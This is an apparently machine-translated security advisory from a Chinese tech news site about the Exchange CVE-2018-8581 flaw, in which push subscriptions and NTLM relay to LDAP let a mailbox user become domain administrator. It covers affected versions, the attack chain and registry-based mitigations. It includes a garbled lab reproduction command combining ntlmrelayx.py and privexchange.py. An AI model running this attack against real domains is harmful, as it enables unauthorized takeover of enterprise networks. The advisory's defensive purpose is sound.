Shulou(Shulou.com)05/31 Report--

What this article shares to you is about the early warning of Exchange CVE-2018-8581 loopholes. The editor thinks it is very practical, so I share it with you. I hope you can get something after reading this article. Let's take a look at it with the editor.

Yesterday, foreign security researcher dirkjanm published the details of the exploitation of a rights enhancement vulnerability on the Exchange server through a blog post, the vulnerability number is CVE-2018-8581. In fact, the vulnerability was revealed in a technical blog published by ZERO DAY INITIATIVE in December last year. The vulnerability exploits the SSRF of the Exchange server and highly privileged requests, resulting in users with legitimate mailbox credentials being promoted to domain administration privileges. Currently, Microsoft has not released any patch for this vulnerability, only provides a means to mitigate the attack, but this method is not applicable to all Exchange servers.

Exchange server is a mail server provided by Microsoft. In addition to the traditional mail basic functions, Exchange also has many connections with active directory domain services and other Microsoft-related services and components under the background of Microsoft. Considering that the Exchange mail server accounts for a very high proportion of use in the enterprise environment, and the scope of the vulnerability is relatively wide, users are requested to take corresponding measures in time.

Scope of impact of vulnerability

Exchange 2010 ~ Exchange 2016

Vulnerability hazard

Through the mastered mailbox user credentials, an attacker can promote an ordinary user to domain administrator privileges under certain conditions.

Vulnerability exploitation condition

Under the default configuration of Exchange, the attacker has legitimate mailbox user credentials, and the vulnerability is exploited through NTLM replay, so the attacker needs to have obtained available hosts in the intranet environment.

Brief introduction of vulnerabilities

The vulnerability arises from several aspects:

First, Exchange allows any user (as long as it is authenticated) to create a push subscription (Push Subscription) through the EWS interface, and can specify any URL as the destination for notification push

Secondly, after the notification is subscribed to push, when the push is triggered, Exchange uses the DefaultCredentials property of the CredentialCache class. Because EWS runs with SYSTEM authority, HTTP requests issued when using DefaultCredentials will use this permission to initiate NTLM authentication

In EWS requests, by using SerializedSecurityContext in Header, specifying SID can achieve identity camouflage so that EWS invocation can be performed as the specified user.

As a result of the above problems, ordinary mailbox users can delegate and view any mailbox with high privileges through EWS, which is also the details of the vulnerability first published by ZDI in the blog.

Since this vulnerability involves a replay attack of NTLM, an easy way to think of is to replay the credential to the domain control machine, which is also the way to replay NTLM to the domain control LDAP service mentioned by security researcher dirkjanm in his blog. Since the replayed NTLM credential comes from the highest permission of the Exchange server, use this permission and have the highest permission in the domain to lift rights for ordinary users.

Loophole recurrence

10.0.83.11 is the attacker

10.0.83.93 is the domain control server

10.0.83.94 is the Exchange server

Execute the following command:

Ntlmrelayx.py-t ldap://10.0.83.93--escalate-user wangwuprivexchange.py-ah 10.0.83.11-u wangwu-ppassword-- debug-d fb.com 10.0.83.94-debug

When ntlmrelayx.py receives the request, you need to manually trigger the notification push, or wait for the push to time out. You can see that wangwu has successfully elevated rights as a domain administrator.

Mitigation measures

Microsoft's official mitigation measure at the time was to delete a key in the registry, DisableLoopbackCheck:

Reg delete HKEY_LOCAL_MACHINE\ SYSTEM\ CurrentControlSet\ Control\ Lsa / v DisableLoopbackCheck / f

From the point of view of mitigating the attack, SMB signature verification can also be enabled on the domain controller, which is an effective way to prevent NTLM replay attacks. The details are as follows: this repair method actually limits NTLM replay, so that this kind of attack can be alleviated to a certain extent. The drawback of this repair is that it is invalid when the role of the Exchange server is split and installed, that is, the Mailbox server role and the client access server role are not installed on the same server.

HKEY_LOCAL_MACHIME\ System\ CurrentControlSet\ Services\ LanManServer\ Paramete

Refer to the registry location above, add EnableSecuritySignature and RequireSecuritySignature, and set their values to 1 to restart the operating system.

This is what the Exchange CVE-2018-8581 loophole warning is like. The editor believes that there are some knowledge points that we may see or use in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.